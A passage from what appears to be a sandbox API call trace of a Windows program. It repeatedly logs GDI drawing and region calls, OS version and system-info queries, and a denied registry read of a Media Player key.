(color=0xff0000) returned 0x1100e45 [0088.086] DeleteObject (ho=0x1100e45) returned 1 [0088.086] DeleteObject (ho=0x450401cd) returned 1 [0088.086] DeleteObject (ho=0x430401d0) returned 1 [0088.086] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.086] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.086] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.086] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.086] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.086] BeginPath (hdc=0x0) returned 0 [0088.087] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.087] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.087] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.087] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.087] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.087] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.087] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.087] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.087] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x460401cd [0088.087] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x440401d0 [0088.087] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e46 [0088.087] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e47 [0088.087] CombineRgn (hrgnDst=0x1040e46, hrgnSrc1=0x460401cd, hrgnSrc2=0x440401d0, iMode=1) returned 1 [0088.087] CombineRgn (hrgnDst=0x1040e47, hrgnSrc1=0x460401cd, hrgnSrc2=0x440401d0, iMode=4) returned 2 [0088.087] CreateSolidBrush (color=0xff) returned 0x2100e45 [0088.087] CreateSolidBrush (color=0xff0000) returned 0x1100e48 [0088.087] DeleteObject (ho=0x1100e48) returned 1 [0088.087] DeleteObject (ho=0x440401d0) returned 1 [0088.087] DeleteObject (ho=0x460401cd) returned 1 [0088.087] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.087] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.087] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.087] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.087] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.087] BeginPath (hdc=0x0) returned 0 [0088.087] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.087] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.087] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.087] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.087] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.087] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.088] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.088] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x450401d0 [0088.088] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x470401cd [0088.088] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e49 [0088.088] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e4a [0088.088] CombineRgn (hrgnDst=0x1040e49, hrgnSrc1=0x450401d0, hrgnSrc2=0x470401cd, iMode=1) returned 1 [0088.088] CombineRgn (hrgnDst=0x1040e4a, hrgnSrc1=0x450401d0, hrgnSrc2=0x470401cd, iMode=4) returned 2 [0088.088] CreateSolidBrush (color=0xff) returned 0x2100e48 [0088.088] CreateSolidBrush (color=0xff0000) returned 0x1100e4b [0088.088] DeleteObject (ho=0x1100e4b) returned 1 [0088.088] DeleteObject (ho=0x470401cd) returned 1 [0088.088] DeleteObject (ho=0x450401d0) returned 1 [0088.088] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.088] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.088] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.088] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.088] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.088] BeginPath (hdc=0x0) returned 0 [0088.088] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.088] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.088] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.088] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.088] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.088] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.088] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.088] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x480401cd [0088.088] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x460401d0 [0088.088] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e4c [0088.088] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e4d [0088.089] CombineRgn (hrgnDst=0x1040e4c, hrgnSrc1=0x480401cd, hrgnSrc2=0x460401d0, iMode=1) returned 1 [0088.089] CombineRgn (hrgnDst=0x1040e4d, hrgnSrc1=0x480401cd, hrgnSrc2=0x460401d0, iMode=4) returned 2 [0088.089] CreateSolidBrush (color=0xff) returned 0x2100e4b [0088.089] CreateSolidBrush (color=0xff0000) returned 0x1100e4e [0088.089] DeleteObject (ho=0x1100e4e) returned 1 [0088.089] DeleteObject (ho=0x460401d0) returned 1 [0088.089] DeleteObject (ho=0x480401cd) returned 1 [0088.089] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.089] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.089] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.089] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.089] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.089] BeginPath (hdc=0x0) returned 0 [0088.089] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.089] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.089] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.089] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.089] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.089] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.089] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.089] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.089] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x470401d0 [0088.089] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x490401cd [0088.089] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e4f [0088.089] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e50 [0088.089] CombineRgn (hrgnDst=0x1040e4f, hrgnSrc1=0x470401d0, hrgnSrc2=0x490401cd, iMode=1) returned 1 [0088.089] CombineRgn (hrgnDst=0x1040e50, hrgnSrc1=0x470401d0, hrgnSrc2=0x490401cd, iMode=4) returned 2 [0088.089] CreateSolidBrush (color=0xff) returned 0x2100e4e [0088.089] CreateSolidBrush (color=0xff0000) returned 0x1100e51 [0088.089] DeleteObject (ho=0x1100e51) returned 1 [0088.089] DeleteObject (ho=0x490401cd) returned 1 [0088.089] DeleteObject (ho=0x470401d0) returned 1 [0088.089] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.089] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.089] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.089] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.090] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.090] BeginPath (hdc=0x0) returned 0 [0088.090] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.090] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.090] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.090] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.090] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.090] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.090] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.090] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.090] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4a0401cd [0088.090] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x480401d0 [0088.090] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e52 [0088.090] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e53 [0088.090] CombineRgn (hrgnDst=0x1040e52, hrgnSrc1=0x4a0401cd, hrgnSrc2=0x480401d0, iMode=1) returned 1 [0088.090] CombineRgn (hrgnDst=0x1040e53, hrgnSrc1=0x4a0401cd, hrgnSrc2=0x480401d0, iMode=4) returned 2 [0088.090] CreateSolidBrush (color=0xff) returned 0x2100e51 [0088.090] CreateSolidBrush (color=0xff0000) returned 0x1100e54 [0088.090] DeleteObject (ho=0x1100e54) returned 1 [0088.090] DeleteObject (ho=0x480401d0) returned 1 [0088.090] DeleteObject (ho=0x4a0401cd) returned 1 [0088.090] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.090] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.090] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.090] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.090] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.090] BeginPath (hdc=0x0) returned 0 [0088.090] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.090] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.090] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.090] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.090] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.090] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.090] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.090] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.091] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x490401d0 [0088.091] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4b0401cd [0088.091] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e55 [0088.091] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e56 [0088.091] CombineRgn (hrgnDst=0x1040e55, hrgnSrc1=0x490401d0, hrgnSrc2=0x4b0401cd, iMode=1) returned 1 [0088.091] CombineRgn (hrgnDst=0x1040e56, hrgnSrc1=0x490401d0, hrgnSrc2=0x4b0401cd, iMode=4) returned 2 [0088.091] CreateSolidBrush (color=0xff) returned 0x2100e54 [0088.091] CreateSolidBrush (color=0xff0000) returned 0x1100e57 [0088.091] DeleteObject (ho=0x1100e57) returned 1 [0088.091] DeleteObject (ho=0x4b0401cd) returned 1 [0088.091] DeleteObject (ho=0x490401d0) returned 1 [0088.091] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.091] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.091] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.091] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.091] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.091] BeginPath (hdc=0x0) returned 0 [0088.091] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.091] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.091] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.091] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.091] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.091] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.091] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.091] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.091] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4c0401cd [0088.091] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4a0401d0 [0088.091] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e58 [0088.091] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e59 [0088.091] CombineRgn (hrgnDst=0x1040e58, hrgnSrc1=0x4c0401cd, hrgnSrc2=0x4a0401d0, iMode=1) returned 1 [0088.091] CombineRgn (hrgnDst=0x1040e59, hrgnSrc1=0x4c0401cd, hrgnSrc2=0x4a0401d0, iMode=4) returned 2 [0088.091] CreateSolidBrush (color=0xff) returned 0x2100e57 [0088.091] CreateSolidBrush (color=0xff0000) returned 0x1100e5a [0088.092] DeleteObject (ho=0x1100e5a) returned 1 [0088.092] DeleteObject (ho=0x4a0401d0) returned 1 [0088.092] DeleteObject (ho=0x4c0401cd) returned 1 [0088.092] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.092] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.092] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.092] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.092] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.092] BeginPath (hdc=0x0) returned 0 [0088.092] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.092] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.092] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.092] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.092] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.092] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.092] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.092] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.092] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4b0401d0 [0088.092] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4d0401cd [0088.092] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e5b [0088.092] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e5c [0088.092] CombineRgn (hrgnDst=0x1040e5b, hrgnSrc1=0x4b0401d0, hrgnSrc2=0x4d0401cd, iMode=1) returned 1 [0088.092] CombineRgn (hrgnDst=0x1040e5c, hrgnSrc1=0x4b0401d0, hrgnSrc2=0x4d0401cd, iMode=4) returned 2 [0088.092] CreateSolidBrush (color=0xff) returned 0x2100e5a [0088.092] CreateSolidBrush (color=0xff0000) returned 0x1100e5d [0088.092] DeleteObject (ho=0x1100e5d) returned 1 [0088.092] DeleteObject (ho=0x4d0401cd) returned 1 [0088.092] DeleteObject (ho=0x4b0401d0) returned 1 [0088.092] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.092] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.092] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.092] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.092] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.092] BeginPath (hdc=0x0) returned 0 [0088.092] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.092] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.092] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.092] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.093] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.093] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.093] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.093] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.093] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4e0401cd [0088.093] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4c0401d0 [0088.093] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e5e [0088.093] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e5f [0088.093] CombineRgn (hrgnDst=0x1040e5e, hrgnSrc1=0x4e0401cd, hrgnSrc2=0x4c0401d0, iMode=1) returned 1 [0088.093] CombineRgn (hrgnDst=0x1040e5f, hrgnSrc1=0x4e0401cd, hrgnSrc2=0x4c0401d0, iMode=4) returned 2 [0088.093] CreateSolidBrush (color=0xff) returned 0x2100e5d [0088.093] CreateSolidBrush (color=0xff0000) returned 0x1100e60 [0088.093] DeleteObject (ho=0x1100e60) returned 1 [0088.093] DeleteObject (ho=0x4c0401d0) returned 1 [0088.093] DeleteObject (ho=0x4e0401cd) returned 1 [0088.093] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.093] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, 